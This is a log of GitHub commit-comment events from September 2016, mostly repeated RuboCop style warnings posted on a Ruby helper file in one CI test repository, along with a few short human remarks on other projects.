{"id":"4544391160","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974290,"position":null,"line":58,"path":"helper.rb:58:81: C: Line is too long. [86/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:54Z","updated_at":"2016-09-10T17:21:54Z","body":"Line is too long. [86/80]"}},"created_at":"2016-09-10T17:21:54Z"}
{"id":"4544391186","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974291,"position":null,"line":59,"path":"helper.rb:59:13: C: Redundant self detected.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:55Z","updated_at":"2016-09-10T17:21:55Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:21:55Z"}
{"id":"4544391211","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974292,"position":null,"line":60,"path":"helper.rb:60:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:57Z","updated_at":"2016-09-10T17:21:57Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:21:57Z"}
{"id":"4544393688","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974295,"position":null,"line":26,"path":"helper.rb:26:81: C: Line is too long. [96/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:23:49Z","updated_at":"2016-09-10T17:23:49Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:23:49Z"}
{"id":"4544393719","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974296,"position":null,"line":27,"path":"helper.rb:27:22: C: Use the new Ruby 1.9 hash syntax.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:23:50Z","updated_at":"2016-09-10T17:23:50Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T17:23:50Z"}
{"id":"4544393747","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974297,"position":null,"line":28,"path":"helper.rb:28:15: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:23:52Z","updated_at":"2016-09-10T17:23:52Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:23:52Z"}
{"id":"4544393814","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974298,"position":null,"line":32,"path":"helper.rb:32:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:23:54Z","updated_at":"2016-09-10T17:23:54Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:23:54Z"}
{"id":"4544393847","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974300,"position":null,"line":32,"path":"helper.rb:32:24: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:23:56Z","updated_at":"2016-09-10T17:23:56Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:23:56Z"}
{"id":"4544393873","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974301,"position":null,"line":33,"path":"helper.rb:33:28: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:23:58Z","updated_at":"2016-09-10T17:23:58Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:23:58Z"}
{"id":"4544393965","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974302,"position":null,"line":35,"path":"helper.rb:35:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:01Z","updated_at":"2016-09-10T17:24:01Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:24:01Z"}
{"id":"4544394035","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974303,"position":null,"line":35,"path":"helper.rb:35:23: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:04Z","updated_at":"2016-09-10T17:24:04Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:24:04Z"}
{"id":"4544394063","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974304,"position":null,"line":38,"path":"helper.rb:38:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:06Z","updated_at":"2016-09-10T17:24:06Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:24:06Z"}
{"id":"4544394137","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974305,"position":null,"line":38,"path":"helper.rb:38:25: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:09Z","updated_at":"2016-09-10T17:24:09Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:24:09Z"}
{"id":"4544394266","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974306,"position":null,"line":39,"path":"helper.rb:39:29: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:13Z","updated_at":"2016-09-10T17:24:13Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:24:13Z"}
{"id":"4544394364","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974307,"position":null,"line":44,"path":"helper.rb:44:14: C: Redundant self detected.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:16Z","updated_at":"2016-09-10T17:24:16Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:24:16Z"}
{"id":"4544394581","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974308,"position":null,"line":50,"path":"helper.rb:50:3: C: Assignment Branch Condition size for rubocop is too high. [16.76/15]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:25Z","updated_at":"2016-09-10T17:24:25Z","body":"Assignment Branch Condition size for rubocop is too high. [16.76/15]"}},"created_at":"2016-09-10T17:24:25Z"}
{"id":"4544394606","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18974309,"position":null,"line":null,"path":null,"commit_id":"a8383f618720cc1417251f9a1d563c305dc8923d","created_at":"2016-09-10T17:24:27Z","updated_at":"2016-09-10T17:24:27Z","body":"wow, been looking for something like this since original android port. nice"}},"created_at":"2016-09-10T17:24:27Z"}
{"id":"4544394607","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974310,"position":null,"line":50,"path":"helper.rb:50:3: C: Method has too many lines. [13/10]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:27Z","updated_at":"2016-09-10T17:24:27Z","body":"Method has too many lines. [13/10]"}},"created_at":"2016-09-10T17:24:27Z"}
{"id":"4544394699","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974311,"position":null,"line":58,"path":"helper.rb:58:23: W: Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:30Z","updated_at":"2016-09-10T17:24:30Z","body":"Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:24:30Z"}
{"id":"4544394752","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974312,"position":null,"line":58,"path":"helper.rb:58:28: W: Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:32Z","updated_at":"2016-09-10T17:24:32Z","body":"Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:24:32Z"}
{"id":"4544394773","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974313,"position":null,"line":58,"path":"helper.rb:58:81: C: Line is too long. [86/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:34Z","updated_at":"2016-09-10T17:24:34Z","body":"Line is too long. [86/80]"}},"created_at":"2016-09-10T17:24:34Z"}
{"id":"4544394824","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974314,"position":null,"line":59,"path":"helper.rb:59:13: C: Redundant self detected.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:35Z","updated_at":"2016-09-10T17:24:35Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:24:35Z"}
{"id":"4544394889","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974315,"position":null,"line":60,"path":"helper.rb:60:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:24:38Z","updated_at":"2016-09-10T17:24:38Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:24:38Z"}
{"id":"4544395177","type":"CommitCommentEvent","actor":{"login":"joshuapinter"},"repo":{"name":"iraycd/react-native-unified-contacts"},"payload":{"comment":{"id":18974316,"position":22,"line":416,"path":"RNUnifiedContacts/RNUnifiedContacts.swift","commit_id":"5e3d986d568d4ebfe44f03656c23dd45e5064d9d","created_at":"2016-09-10T17:24:49Z","updated_at":"2016-09-10T17:24:49Z","body":"Sounds good. Can you add a space before the `as!` and I'll merge it in."}},"created_at":"2016-09-10T17:24:49Z"}
{"id":"4544396451","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974318,"position":26,"line":26,"path":"helper.rb:26:81: C: Line is too long. [96/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:25:36Z","updated_at":"2016-09-10T17:25:36Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:25:36Z"}
{"id":"4544396614","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974319,"position":27,"line":27,"path":"helper.rb:27:22: C: Use the new Ruby 1.9 hash syntax.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:25:42Z","updated_at":"2016-09-10T17:25:42Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T17:25:42Z"}
{"id":"4544396682","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974320,"position":28,"line":28,"path":"helper.rb:28:15: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:25:45Z","updated_at":"2016-09-10T17:25:45Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:25:45Z"}
{"id":"4544396759","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974321,"position":32,"line":32,"path":"helper.rb:32:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:25:49Z","updated_at":"2016-09-10T17:25:49Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:25:49Z"}
{"id":"4544396821","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974322,"position":32,"line":32,"path":"helper.rb:32:24: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:25:52Z","updated_at":"2016-09-10T17:25:52Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:25:52Z"}
{"id":"4544396877","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974323,"position":33,"line":33,"path":"helper.rb:33:28: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:25:54Z","updated_at":"2016-09-10T17:25:54Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:25:54Z"}
{"id":"4544396968","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974324,"position":35,"line":35,"path":"helper.rb:35:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:25:58Z","updated_at":"2016-09-10T17:25:58Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:25:58Z"}
{"id":"4544396996","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/brainbasket"},"payload":{"comment":{"id":18974325,"position":null,"line":null,"path":null,"commit_id":"cb51a5568a1f5a5559762576a2a62cd9d9c11229","created_at":"2016-09-10T17:25:59Z","updated_at":"2016-09-10T17:25:59Z","body":"rwar"}},"created_at":"2016-09-10T17:25:59Z"}
{"id":"4544397057","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974326,"position":35,"line":35,"path":"helper.rb:35:23: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:02Z","updated_at":"2016-09-10T17:26:02Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:26:02Z"}
{"id":"4544397109","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974327,"position":38,"line":38,"path":"helper.rb:38:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:04Z","updated_at":"2016-09-10T17:26:04Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:26:04Z"}
{"id":"4544397162","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974328,"position":38,"line":38,"path":"helper.rb:38:25: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:06Z","updated_at":"2016-09-10T17:26:06Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:26:06Z"}
{"id":"4544397245","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974329,"position":39,"line":39,"path":"helper.rb:39:29: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:09Z","updated_at":"2016-09-10T17:26:09Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:26:09Z"}
{"id":"4544397319","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974330,"position":44,"line":44,"path":"helper.rb:44:14: C: Redundant self detected.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:11Z","updated_at":"2016-09-10T17:26:11Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:26:11Z"}
{"id":"4544397392","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974331,"position":50,"line":50,"path":"helper.rb:50:3: C: Assignment Branch Condition size for rubocop is too high. [16.76/15]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:14Z","updated_at":"2016-09-10T17:26:14Z","body":"Assignment Branch Condition size for rubocop is too high. [16.76/15]"}},"created_at":"2016-09-10T17:26:14Z"}
{"id":"4544397458","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974332,"position":50,"line":50,"path":"helper.rb:50:3: C: Method has too many lines. [13/10]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:16Z","updated_at":"2016-09-10T17:26:16Z","body":"Method has too many lines. [13/10]"}},"created_at":"2016-09-10T17:26:16Z"}
{"id":"4544397542","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974333,"position":58,"line":58,"path":"helper.rb:58:23: W: Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:20Z","updated_at":"2016-09-10T17:26:20Z","body":"Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:26:20Z"}
{"id":"4544397608","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974334,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:26:22Z","updated_at":"2016-09-10T17:26:22Z","body":"test16"}},"created_at":"2016-09-10T17:26:22Z"}
{"id":"4544397638","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974335,"position":58,"line":58,"path":"helper.rb:58:28: W: Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:23Z","updated_at":"2016-09-10T17:26:23Z","body":"Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:26:23Z"}
{"id":"4544397671","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974336,"position":58,"line":58,"path":"helper.rb:58:81: C: Line is too long. [86/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:24Z","updated_at":"2016-09-10T17:26:24Z","body":"Line is too long. [86/80]"}},"created_at":"2016-09-10T17:26:24Z"}
{"id":"4544397702","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974337,"position":59,"line":59,"path":"helper.rb:59:13: C: Redundant self detected.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:26Z","updated_at":"2016-09-10T17:26:26Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:26:26Z"}
{"id":"4544397767","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974338,"position":60,"line":60,"path":"helper.rb:60:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:26:29Z","updated_at":"2016-09-10T17:26:29Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:26:29Z"}
{"id":"4544398971","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18974340,"position":null,"line":null,"path":null,"commit_id":"c8e920787989e63874a8206a26f180fcf3e5e381","created_at":"2016-09-10T17:27:17Z","updated_at":"2016-09-10T17:27:17Z","body":"Yes. Compiler is just noisy."}},"created_at":"2016-09-10T17:27:17Z"}
{"id":"4544403060","type":"CommitCommentEvent","actor":{"login":"jasmin47"},"repo":{"name":"tnegoshi/sEAT"},"payload":{"comment":{"id":18974343,"position":null,"line":null,"path":null,"commit_id":"86c3c0f69c1dae0c973d342393a943f65465c807","created_at":"2016-09-10T17:29:51Z","updated_at":"2016-09-10T17:29:51Z","body":"If the syntax of the queries is incorrect, you can't seed the database etc. So I decided to comment out the queries of the drafts I had done (hadn't been tested yet) for the sake of keeping the master branch clean and fix them one at a time later. "}},"created_at":"2016-09-10T17:29:51Z"}
{"id":"4544403238","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974344,"position":26,"line":26,"path":"helper.rb:26:81: C: Line is too long. [96/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:29:57Z","updated_at":"2016-09-10T17:29:57Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:29:57Z"}
{"id":"4544403314","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974345,"position":27,"line":27,"path":"helper.rb:27:22: C: Use the new Ruby 1.9 hash syntax.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:00Z","updated_at":"2016-09-10T17:30:00Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T17:30:00Z"}
{"id":"4544403397","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974346,"position":28,"line":28,"path":"helper.rb:28:15: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:03Z","updated_at":"2016-09-10T17:30:03Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:30:03Z"}
{"id":"4544403440","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974347,"position":32,"line":32,"path":"helper.rb:32:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:04Z","updated_at":"2016-09-10T17:30:04Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:30:04Z"}
{"id":"4544403486","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18974348,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-10T17:30:06Z","updated_at":"2016-09-10T17:30:06Z","body":"![Network choice options](http://i.imgur.com/Ved8AUd.jpg)"}},"created_at":"2016-09-10T17:30:06Z"}
{"id":"4544403515","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974349,"position":32,"line":32,"path":"helper.rb:32:24: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:07Z","updated_at":"2016-09-10T17:30:07Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:30:07Z"}
{"id":"4544403534","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974350,"position":33,"line":33,"path":"helper.rb:33:28: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:08Z","updated_at":"2016-09-10T17:30:08Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:30:08Z"}
{"id":"4544403581","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974351,"position":35,"line":35,"path":"helper.rb:35:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:10Z","updated_at":"2016-09-10T17:30:10Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:30:10Z"}
{"id":"4544403777","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974352,"position":35,"line":35,"path":"helper.rb:35:23: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:15Z","updated_at":"2016-09-10T17:30:15Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:30:15Z"}
{"id":"4544403830","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974353,"position":38,"line":38,"path":"helper.rb:38:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:17Z","updated_at":"2016-09-10T17:30:17Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:30:17Z"}
{"id":"4544403873","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974354,"position":38,"line":38,"path":"helper.rb:38:25: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:18Z","updated_at":"2016-09-10T17:30:18Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:30:18Z"}
{"id":"4544403980","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974355,"position":39,"line":39,"path":"helper.rb:39:29: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:21Z","updated_at":"2016-09-10T17:30:21Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:30:21Z"}
{"id":"4544404039","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974356,"position":44,"line":44,"path":"helper.rb:44:14: C: Redundant self detected.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:30:24Z","updated_at":"2016-09-10T17:30:24Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:30:24Z"}
{"id":"4544404119","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974357,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:30:27Z","updated_at":"2016-09-10T17:30:27Z","body":"test17"}},"created_at":"2016-09-10T17:30:27Z"}
{"id":"4544404285","type":"CommitCommentEvent","actor":{"login":"lexmag"},"repo":{"name":"elixir-addicts/rollbax"},"payload":{"comment":{"id":18974358,"position":null,"line":null,"path":null,"commit_id":"dfe198b528817fcbacdddfcb0df01926350b9556","created_at":"2016-09-10T17:30:33Z","updated_at":"2016-09-10T17:30:33Z","body":"💛"}},"created_at":"2016-09-10T17:30:33Z"}
